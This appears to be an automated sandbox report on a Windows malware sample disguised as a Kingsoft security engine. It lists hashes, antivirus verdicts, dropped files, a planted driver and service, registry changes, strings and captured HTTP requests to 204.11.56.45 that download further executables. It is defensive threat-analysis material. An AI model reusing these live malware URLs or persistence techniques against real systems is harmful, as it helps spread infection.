Analysis Date2015-01-31 09:54:02
MD531066e85f0d5895a80cb16b589311497
SHA1a7fc303c78e1daf5252ebde33ad142756bcab54e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 0bc2ffd32265a08d72b795b18265828d sha1: dd2a446014a37556f39173b802c63a4e46e09366 size: 23552
Section.rdata md5: f179218a059068529bdb4637ef5fa28e sha1: 6035d27db526131eb0f29aee60cfcdbb5072ed7d size: 4608
Section.data md5: 975304d6dd6c4a4f076b15511e2bbbc0 sha1: 1f65340672c91ffd0f2583ff104beaece43c7855 size: 1024
Section.ndata md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.rsrc md5: 7cb59d0370604d227c9de6c967d9b693 sha1: 65f1dc962234785d24f149610e944e545c1b1967 size: 19968
Section.tc<2 md5: 7f019a7b04df881a9c88996a7a94de17 sha1: c87f2b29e7a2f60f19be31a3c9bc1ca3159d96a0 size: 26624
Timestamp2009-12-05 22:50:46
VersionLegalCopyright: 版权所有(C) 2010 金山卫士
FileVersion: 1.0.0.1001
CompanyName: 金山卫士
LegalTrademarks: 金山卫士
Comments: 金山卫士V10引擎
ProductName: 金山卫士V10引擎
ProductVersion: 1.0.0.1001
FileDescription: 金山卫士V10引擎
PEhash7386fcba71e5141f8a3a0e834aa5c5a624999605
IMPhash099c0646ea7282d232219f8807883be0
AV360 SafeVirus.Win32.Agent.O
AVAd-AwareWin32.Viking.AR
AVAlwil (avast)Viking-CF:Win32:Viking-CF
AVArcabit (arcavir)Win32.Viking.AR
AVAuthentiumW32/Viking.A.gen!Eldorado
AVAvira (antivir)W32/Fujacks.DR
AVBullGuardWin32.Viking.AR
AVCA (E-Trust Ino)Win32/Viking.D
AVCAT (quickheal)W32.Agent.DP
AVClamAVWorm.Fujack-55
AVDr. WebWin32.HLLW.Autoruner.8224
AVEmsisoftWin32.Viking.AR
AVEset (nod32)Win32/Agent.DP virus
AVFortinetW32/Fujacks.BF!tr
AVFrisk (f-prot)W32/Viking.A.gen!Eldorado
AVF-SecureWin32.Viking.AR
AVGrisoft (avg)Win32/Fujacks.S
AVIkarusTrojan-Downloader.Win32.Jadtre
AVK7Virus ( 00108a531 )
AVKasperskyVirus.Win32.Agent.dp
AVMalwareBytesno_virus
AVMcafeeW32/Fujacks.ay
AVMicrosoft Security EssentialsVirus:Win32/Viking.NK
AVMicroWorld (escan)Win32.Viking.AR
AVRisingWin32.Agent.hn
AVSophosW32/FuzVir-A
AVSymantecW32.Loorp.A!inf
AVTrend MicroPE_JEEFO.D
AVVirusBlokAda (vba32)Virus.Win32.Koklek

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nsw1.tmp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates FileC:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates FilePIPE\SfcApi
Creates FilePIPE\wkssvc
Creates FileC:\WINDOWS\system32\qmgr.dll
Creates FileC:\WINDOWS\system32\mspmsnsv.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts ServiceWmdmPmSN

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 804

Process
↳ Pid 848

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝
2
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CYLACECT\desktop.ini
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CL63SHUB\desktop.ini
Creates FileNtHid
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates FileC:\Documents and Settings\NetworkService\Cookies\index.dat
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\85AV4L6V\desktop.ini
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\2NS3SM8E\desktop.ini
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\TEMP\NtHid.sys
Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\WINDOWS\TEMP\NtHid.sys
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates Mutexc:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!networkservice!cookies!
Creates Mutexc:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates ServiceNtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS204.11.56.45
Winsock DNSwww.490a-B8B5-9B8C1E870B0C.com
Winsock DNSwww.baidu.com
Winsock DNSpc1.114central.com

Process
↳ Pid 1204

Process
↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates FileWMIDataDevice

Process
↳ Pid 1840

Process
↳ Pid 1096

Network Details:

DNSwww.a.shifen.com
Type: A
180.76.3.151
DNSpc1.114central.com
Type: A
204.11.56.45
DNSwww.baidu.com
Type: A
DNSwww.490a-B8B5-9B8C1E870B0C.com
Type: A
DNSnbtj.114anhui.com
Type: A
HTTP GEThttp://204.11.56.45/nbok01/dnfTT.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://204.11.56.45/nbok01/tlTT.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://204.11.56.45/nbok01/RXCQTT.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1033 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1034 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1035 ➝ 204.11.56.45:80

Raw Pcap
0x00000000 (00000)   47455420 2f6e626f 6b30312f 646e6654   GET /nbok01/dnfT
0x00000010 (00016)   542e6578 65204854 54502f31 2e300d0a   T.exe HTTP/1.0..
0x00000020 (00032)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x00000030 (00048)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000040 (00064)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000050 (00080)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000060 (00096)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x00000070 (00112)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x00000080 (00128)   37323729 0d0a486f 73743a20 3230342e   727)..Host: 204.
0x00000090 (00144)   31312e35 362e3435 0d0a436f 6e6e6563   11.56.45..Connec
0x000000a0 (00160)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000b0 (00176)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f6e626f 6b30312f 746c5454   GET /nbok01/tlTT
0x00000010 (00016)   2e657865 20485454 502f312e 300d0a41   .exe HTTP/1.0..A
0x00000020 (00032)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000030 (00048)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000040 (00064)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000050 (00080)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000060 (00096)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000070 (00112)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x00000080 (00128)   3237290d 0a486f73 743a2032 30342e31   27)..Host: 204.1
0x00000090 (00144)   312e3536 2e34350d 0a436f6e 6e656374   1.56.45..Connect
0x000000a0 (00160)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000b0 (00176)   0a0d0a0a                              ....

0x00000000 (00000)   47455420 2f6e626f 6b30312f 52584351   GET /nbok01/RXCQ
0x00000010 (00016)   54542e65 78652048 5454502f 312e300d   TT.exe HTTP/1.0.
0x00000020 (00032)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000030 (00048)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000040 (00064)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000050 (00080)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000060 (00096)   646f7773 204e5420 352e313b 20535631   dows NT 5.1; SV1
0x00000070 (00112)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x00000080 (00128)   30373237 290d0a48 6f73743a 20323034   0727)..Host: 204
0x00000090 (00144)   2e31312e 35362e34 350d0a43 6f6e6e65   .11.56.45..Conne
0x000000a0 (00160)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000b0 (00176)   650d0a0d 0a                           e....


Strings
 " "
E
...
......:
000003a8
1.0.0.1001
(C) 2010 
Comments
CompanyName
FILE
FileDescription
FileVersion
LegalCopyright
LegalTrademarks
msctls_progress32
Please wait while Setup is loading...
ProductName
ProductVersion
StringFileInfo
SysListView32
Translation
VarFileInfo
VS_VERSION_INFO
*?|<>/":
08101BB
0h0l0p0t0x0|
1.1E1K1Z1h1
;13B<J<
1=>=F=
:1G1P1]1
?%?2?]?
2(2B2N2W2c2l2x2
2?3H3Q
2D2J2O2U2b1n2t2
>)>2>E>S>\>s
2K2f2v2
2T2d2{2
3$30l3XkG
3=3B3j3p3|3
`;3D;H;L
@3T3e3
4&414]4
4%4+4G4z4
490a-B8B5-9
49-E88E-4c47-98DC
4aaf-A336-C255
4Q5e5x
5$5)56A
5!6&6/6
;!;+;5;?;C;J;P;Z;d;n;x;
:5:F:Y:w:|:
60gnv+
6.6:6C6M6W6\6
#&>6>Cg
71767D7R7^7i7p7
7.{645FF040
7FC663
7@ip:K
?7N7T7]
8-00AA
@.&'85
{-8<8^8
>!>*>8>B>H>V>`>n>t>
8NCRCu
9*:/$:
954E}K
@\96DBA2^
9 9[9`9g9m9s9~9
9&9/9>9Q9e9o9{9
-9;9A9F9
9ao^@q
9.:U&~
A0^0s0
A4J4Y4_4
A67-586
AdjustTokenPrivileges
ADVAPI32
ADVAPI32.dll
AE4C57'
agX \s
a Play
AppendMenuA
appmgmts.dlld
"bd	WVS
BeginPaint
browser
C0M0W0
C1E870B0C
CallWindowProcA
CancelConne
 cannot be run i
CharNextA
CharPrevA
CheckDlgButton
CloseClipboard
CloseHandle
CoCreateInstance
COMCTL32.dll
CompareFileTime
Control Panel\Desktop\ResourceLocale
CopyFileA
Copyro
CoTaskMemFree
<'<CP<Z<|<
CreateBrushIndirect
CreateDialogParamA
CreateDirectoryA
CreateFileA
CreateFontIndirectA
CreatePopupMenu
CreateProcessA
CreateThread
CreateWindowExA
crypt'c
... %d%%
D$0+D$(P
D0H0L0P0T0X0\0`0dw4
DA-6D69-472e-8981-DBC71
@.data
D$(+D$ SSP
default
.DEFAULT\Control Panel\International
DefWindowProcA
DeleteFileA
DeleteObject
DestroyWindow
(D/fc_oL
DialogBoxParamA
DispatchMessageA
DOS mode.
DrawTextA
D$(SPS
dU5 B~
=&=,=D=v=
D@wwwx
E8J8O8[8`8i8o8z8
EmptyClipboard
EnableMenuItem
EnableWindow
EndDialog
EndPaint
ep1'*"/
eParam$
Error launching installer
Error writing temporary file. Make sure your temp folder is valid.
Esht*6
euG	/a@[
ExecuUA
ExitProcess
ExitWindowsEx
ExpandEnvironmentStringsA
Expor.exe
F??3@YAXP
f4)!ba
f+D?	D
FillRect
FindClose
FindFirstFileA
FindNextFileA
FindWindowExA
FO1R8O
FreeLibrary
fY.Req
G| 0+020e0k
GDI32.dll
GetClassInfoA
GetClientRect
GetCommandLineA
GetCurrentProcess
GetDeviceCaps
GetDiskFreeSpaceA
GetDiskFreeSpaceExA
GetDlgItem
GetDlgItemTextA
GetExitCodeProcess
GetFileAttributesA
GetFileSize
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetFullPathNameA
GetLastError
GetMessagePos
GetModuleFileNameA
GetModuleHandleA
GetPrivateProfileStringA
GetProcAddress
GetShortPathNameA
GetSysColor
GetSystemDirectoryA
GetSystemMenu
GetSystemMetrics
GetTempFileNameA
GetTempPathA
GetTickCount
GetUserDefaultUILanguage
GetVersion
GetWindowLongA
GetWindowRect
GetWindowsDirectoryA
ggB=l^8@Yj
GlobalAlloc
GlobalFree
GlobalLock
GlobalUnlock
h1l1.T
;hDdk h$
HrCg@b	g(
http://nsis.sf.net/NSIS_Error
Hur3'$
ifyTrLo
igVCRT
ImageList_AddMasked
ImageList_Create
ImageList_Destroy
incomplete download and damaged media. Contact the
i	nd4bd
InfGma
ingCompatibil
Installer integrity check has failed. Common causes include
installer's author to obtain a new copy.
Instu_
InvalidateRect
IocSymbgT*
iRichu
IsWindow
IsWindowEnabled
IsWindowVisible
i|tlh`
IXR-!m
j/0@0E0R0f0
 -k 4/
kca:\lsa
KERNEL32
KERNEL32.dll
KERNEL32.DLL
KEveny
K:\Q.pdb`q
krnlHe
l0AolY
L5PFHP7b
LoadBitmapA
LoadCursorA
LoadImageA
LoadLibraryA
LoadLibraryExA
LookupPrivilegeValueA
lp6a J
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpynA
lstrlenA
M:d:m:
MessageBoxIndirectA
\Microsoft\Internet Explorer\Quick Launch
More information at:
MoveFileA
MoveFileExA
MSN Gam
MSVCRT.dll
MulDiv
MultiByteToWideChar
.ndata
NSIS Error
~nsu.tmp
 NT\Curr
NtQu9y
NulluM	E
Nv`mG}
oft\Wud
ole32.dll
OleInitialize
OleUninitialize
o@P3e4
Op-;4$
~OPEN=-
OpenClipboard
OpenProcessToken
+OpsSCM
|otB.8
p:<;9_
PathFileExistsA
PeekMessageA
>P?e?k?
PostQuitMessage
PPPPPP
PsGe])
pVKwOf
PWithTag
q$A3<.
qidu.com
QQQQQQQ
\Ra7207
 `.rdat[
`.rdata
ReadFile
RECYCLER
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegDeleteKeyExA
RegDeleteValueA
RegEnumKeyA
RegEnumValueA
RegisterClassA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
Remote
RemoveDirectoryA
[Rename]
RichEd20
RichEd32
RichEdit
RichEdit20A
R+-JJPU&++-JPP
_rju@_fd
-<RoA%'_h7
RtlIoU
S1[1`1m1
{schedsvc
ScreenToClient
SDPSRV
SearchPathA
SelectObject
SendMessageA
SendMessageTimeoutA
SeShutdownPrivilege
SetBkColor
SetBkMode
SetClassLongA
SetClipboardData
SetCurrentDirectoryA
SetCursor
SetDlgItemTextA
SetErrorMode
SetFileAttributesA
SetFilePointer
SetFileTime
SetForegroundWindow
SetTextColor
SetTimer
SetWindowLongA
SetWindowPos
SetWindowTextA
S+.GhXXZZ`hFJ
SHAutoComplete
SHBrowseForFolderA
SHELL32.dll
ShellExecuteA
SHFileOperationA
SHFOLDER
SHGetFileInfoA
SHGetFolderPathA
SHGetPathFromIDListA
SHGetSpecialFolderLocation
SHLWAPI
SHLWAPI.dll
ShowWindow
S++-JKLVED)-JKP
softuV
SOFTWARE\Mi
Software\Microsoft\Windows\CurrentVersion
Sp`FFF
SQSSSPW
sSpec7!:
s_/UYY
swsocknetman1ssdp
SystemParametersInfoA
> _?=t
.tcLCI0
.textVT
_This #g
!This program cannot be run in DOS mode.
T;_;i;z;
tl`TDi
ToFilnH
_^[t	P
TrackPopupMenu
tTisrv
?%_#txg
u49-,?B
>"u:F@
	U;MhOy
uMpr.{
unpacking data: %d%%
#upnphostKn&s
URLDown
USER32.dll
%u.%u%s%s
@;v;{;
V3_3o3x3
V6sion\
v7Os2_qWSArcvF
v95LpA
verifying installer: %d%%
VerQueryValueA
VERSION.dll
#Vh;+@
vieAak:m
VirtualAlloc
VirtualFree
VirtualProtect
vThfad
\v:.X$
W0YX0wx
|w9=trW*
WaitForSingleObject
 winsta0
WmdmPmSN'Fa
Writea7
WriteFile
WritePrivateProfileStringA
wsprintfA
WWk#*A
 X -ibcB"
<)<.<X<i<o
xmlpbS
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
XPTPSW
XPVSSG
XRichS
xV.#"h
XX; tg
.y!GN&
|/Yr3Y
/YW'RB
@z}]u2o